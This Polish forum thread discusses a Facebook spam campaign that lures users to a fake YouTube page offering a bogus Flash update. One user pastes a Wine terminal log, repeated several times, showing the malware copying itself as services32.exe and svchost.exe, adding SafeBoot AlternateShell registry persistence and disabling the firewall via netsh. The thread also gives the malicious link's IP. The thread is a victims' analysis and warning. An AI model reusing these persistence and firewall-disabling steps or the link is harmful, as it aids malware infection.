Włamania na cudze konta na FB... wysyłanie dziwnych linków... proszę o pomoc!

0

Witam!
Od pewnego czasu dostaje na swoje konto dziwne wiadomości w języku angielskim ( pisane z konta od znajomych; nigdy z tego samego... )

http://78.137.45.147/100000036017989

Ktoś skopiował podstronę youtuba i usiluje wcisnąć mi ,że to filimik ze mna w roli głównej ale ,żeby go obejrzeć niby musze zaktualizować flasha...

Domyśliłem się ,że to jakiś fake ale mam Comodo Internet Security Premium więć ściągnąłem to i od razu firewall zasygnalizował mi obecność wirusa i zablokował proces:)

Powiedzcie mi co o tym sądzicie?
W jaki sposób mogę dowiedzieć się kto się w taki sposób bawi?

PS. pod tym filmem widać nawet niby komentarze moich znajomych którzy w ogóle nie mieli nic z tym wspólnego...

Coraz bardziej zrażam się do Facebooka...

1

mi instalator tego "nowszego flasha" wywalił "Access denied" i tyle w okienku się dowiedziałem. W terminalu natomiast:

wine Flash-player.exe
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub

D:\Pobrane>chcp 1251 
wine: cannot find L"C:\\windows\\system32\\chcp.exe"
Nie znaleziono pliku


D:\Pobrane>:try 

D:\Pobrane>copy "D:\Pobrane\Flash-player.exe" "C:\windows\services32.exe" 

D:\Pobrane>if Not exist "C:\windows\services32.exe" goto try 

D:\Pobrane>del 37077768.bat 
37077768.bat : Plik nie znaleziony

D:\Pobrane>chcp 1251 
wine: cannot find L"C:\\windows\\system32\\chcp.exe"
Nie znaleziono pliku


D:\Pobrane>:try 

D:\Pobrane>copy "D:\Pobrane\Flash-player.exe" "C:\windows\update.1\svchost.exe" 
Naruszenie współdzielenia


D:\Pobrane>if Not exist "C:\windows\update.1\svchost.exe" goto try 

D:\Pobrane>del 30293578.bat 
30293578.bat : Plik nie znaleziony
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot AlternateShell 0 REG_SZ services32.exe 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot AlternateShell 0 REG_SZ services32.exe 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\wxpdrivers  0 REG_SZ Service 1
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
Operacja zakończona pomyślnie
Błąd: Argument /IM oczekuje parametru wiersza poleceń.
Użycie: taskkill [/?] [/f] [/im nazwa procesu | /pid id procesu]
Nie uda�o si� uzyska� uchwytu do serwisu.
Nie uda�o si� uzyska� uchwytu do serwisu.
Serwis srvsysdriver32 jest uruchamiany...
Czas wyga�ni�cia ��dania us�ugi
Błąd: Argument /IM oczekuje parametru wiersza poleceń.
Użycie: taskkill [/?] [/f] [/im nazwa procesu | /pid id procesu]
Serwis srvsysdriver32 jest zatrzymywany...
fixme:service:EnumDependentServicesW 0x127590 0x00000001 (nil) 0x00000000 0x33ed6c 0x33ed68 - stub
Niepoprawna kontrola us�ugi
Nie uda�o si� uzyska� uchwytu do serwisu.
Błąd: Nie można znaleźć procesu "sysdriver32_.exe".
Serwis srvsysdriver32 jest uruchamiany...
Czas wyga�ni�cia ��dania us�ugi
Błąd: Nie można znaleźć procesu "sysdriver32_.exe".wine Flash-player.exe
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub

D:\Pobrane>chcp 1251 
wine: cannot find L"C:\\windows\\system32\\chcp.exe"
Nie znaleziono pliku


D:\Pobrane>:try 

D:\Pobrane>copy "D:\Pobrane\Flash-player.exe" "C:\windows\services32.exe" 

D:\Pobrane>if Not exist "C:\windows\services32.exe" goto try 

D:\Pobrane>del 37077768.bat 
37077768.bat : Plik nie znaleziony

D:\Pobrane>chcp 1251 
wine: cannot find L"C:\\windows\\system32\\chcp.exe"
Nie znaleziono pliku


D:\Pobrane>:try 

D:\Pobrane>copy "D:\Pobrane\Flash-player.exe" "C:\windows\update.1\svchost.exe" 
Naruszenie współdzielenia

wine Flash-player.exe
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub

D:\Pobrane>chcp 1251 
wine: cannot find L"C:\\windows\\system32\\chcp.exe"
Nie znaleziono pliku


D:\Pobrane>:try 

D:\Pobrane>copy "D:\Pobrane\Flash-player.exe" "C:\windows\services32.exe" 

D:\Pobrane>if Not exist "C:\windows\services32.exe" goto try 

D:\Pobrane>del 37077768.bat 
37077768.bat : Plik nie znaleziony

D:\Pobrane>chcp 1251 
wine: cannot find L"C:\\windows\\system32\\chcp.exe"
Nie znaleziono pliku


D:\Pobrane>:try 

D:\Pobrane>copy "D:\Pobrane\Flash-player.exe" "C:\windows\update.1\svchost.exe" 
Naruszenie współdzielenia


D:\Pobrane>if Not exist "C:\windows\update.1\svchost.exe" goto try 

D:\Pobrane>del 30293578.bat 
30293578.bat : Plik nie znaleziony
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot AlternateShell 0 REG_SZ services32.exe 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot AlternateShell 0 REG_SZ services32.exe 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\wxpdrivers  0 REG_SZ Service 1
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
Operacja zakończona pomyślnie
Błąd: Argument /IM oczekuje parametru wiersza poleceń.
Użycie: taskkill [/?] [/f] [/im nazwa procesu | /pid id procesu]
Nie uda�o si� uzyska� uchwytu do serwisu.
Nie uda�o si� uzyska� uchwytu do serwisu.
Serwis srvsysdriver32 jest uruchamiany...
Czas wyga�ni�cia ��dania us�ugi
Błąd: Argument /IM oczekuje parametru wiersza poleceń.
Użycie: taskkill [/?] [/f] [/im nazwa procesu | /pid id procesu]
Serwis srvsysdriver32 jest zatrzymywany...
fixme:service:EnumDependentServicesW 0x127590 0x00000001 (nil) 0x00000000 0x33ed6c 0x33ed68 - stub
Niepoprawna kontrola us�ugi
Nie uda�o si� uzyska� uchwytu do serwisu.
Błąd: Nie można znaleźć procesu "sysdriver32_.exe".
Serwis srvsysdriver32 jest uruchamiany...
Czas wyga�ni�cia ��dania us�ugi
Błąd: Nie można znaleźć procesu "sysdriver32_.exe".
D^Cfixme:console:CONSOLE_DefaultHandler Terminating process 39 on event 0
fixme:console:CONSOLE_DefaultHandler Terminating process 29 on event 0
fixme:console:CONSOLE_DefaultHandler Terminating process 8 on event 0

D:\Pobrane>if Not exist "C:\windows\update.1\svchost.exe" goto try 

D:\Pobrane>del 30293578.bat 
30293578.bat : Plik nie znaleziony
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot AlternateShell 0 REG_SZ services32.exe 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot AlternateShell 0 REG_SZ services32.exe 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wxpdrivers  0 REG_SZ Service 1
ADD - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\wxpdrivers  0 REG_SZ Service 1
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
Operacja zakończona pomyślnie
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
fixme:netsh:wmain stub: L"netsh.exe" L"firewall" L"set" L"opmode" L"mode=disable"
Operacja zakończona pomyślnie
Błąd: Argument /IM oczekuje parametru wiersza poleceń.
Użycie: taskkill [/?] [/f] [/im nazwa procesu | /pid id procesu]
Nie uda�o si� uzyska� uchwytu do serwisu.
Nie uda�o si� uzyska� uchwytu do serwisu.
Serwis srvsysdriver32 jest uruchamiany...
Czas wyga�ni�cia ��dania us�ugi
Błąd: Argument /IM oczekuje parametru wiersza poleceń.
Użycie: taskkill [/?] [/f] [/im nazwa procesu | /pid id procesu]
Serwis srvsysdriver32 jest zatrzymywany...
fixme:service:EnumDependentServicesW 0x127590 0x00000001 (nil) 0x00000000 0x33ed6c 0x33ed68 - stub
Niepoprawna kontrola us�ugi
Nie uda�o si� uzyska� uchwytu do serwisu.
Błąd: Nie można znaleźć procesu "sysdriver32_.exe".
Serwis srvsysdriver32 jest uruchamiany...
Czas wyga�ni�cia ��dania us�ugi
Błąd: Nie można znaleźć procesu "sysdriver32_.exe".
D^Cfixme:console:CONSOLE_DefaultHandler Terminating process 39 on event 0
fixme:console:CONSOLE_DefaultHandler Terminating process 29 on event 0
fixme:console:CONSOLE_DefaultHandler Terminating process 8 on event 0

fixme:console:CONSOLE_DefaultHandler Terminating process 39 on event 0
fixme:console:CONSOLE_DefaultHandler Terminating process 29 on event 0
fixme:console:CONSOLE_DefaultHandler Terminating process 8 on event 0

Pewnie dalej by się wykonywało, ale zabiłem serwer wine.
Jak widać ten wirus podmienia kilka plików, ale ogólnie wydaje się być marnie napisany. Cóż... Kolejna reinstalacja Wine mnie czeka xD
D:\Pobrane to winowa wersja katalogu ~/Pobrane

whois wskazuje na Ukrainę, ale same te IP otwiera youtube'a. Jednoznacznie właściciela tego adresu przez whois nie da się określić.

0

Heh czyli jednak ktoś się bawi :)

Mysle ,że to nie będzie Polak bo pisze po angielsku xd

Wciąż te same gadki:

Hey
Wanna se somethink?

Fajnie ,że to sprawdziles :) dzięka :)

0

A to nie jest przypadkiem ten slynny backdoor, ktory instaluje sie po kliknieciu w link? Kumpel mial z tym kiedys problem, caly antywirus zostal uszkodzony przez co pokazywal falszywe alarmy. Przeskanowanie systemu jakims antimalwarem powinno go usunac.
Nie instaluje sie zadnych aktualizacji flasha, jesli nie pochodza one z glownego serwera.

PS. Wybaczcie brak poliskich znakow.

0

Ja wiem ,że się nie instaluje :P
Mi tez go Comodo wykrył i od razu zablokował :P

Ktoś się bawi i chyba dawno nikt mu nie przyfanzolił:P

0

To jest wirus rozpowszechniający się przez Facebooka. Znajomy, który Ci to napisał po prostu zezwolił jakiejś aplikacji na dostęp do czata itp. i po prostu bot pisze do różnych znajomych. Siostra tą "aktualizację" flasha zainstalowała i wirus usunął antywirusa (w tym konkretnym przypadku Avast!) i podmienił jego ikonkę na pulpicie, wchodząc na facebooka widać było wpisy znajomych, którzy "lubią" różne ostre filmiki :D

Tu masz trochę więcej na ten temat: http://www.wykop.pl/artykul/824403/wanna-laugh-on-facebook/ ;)

0

Aha:) to dobrze ,że tego nie instalowałem :P
Dzieka za wyjaśnienie sprawy :P

1 użytkowników online, w tym zalogowanych: 0, gości: 1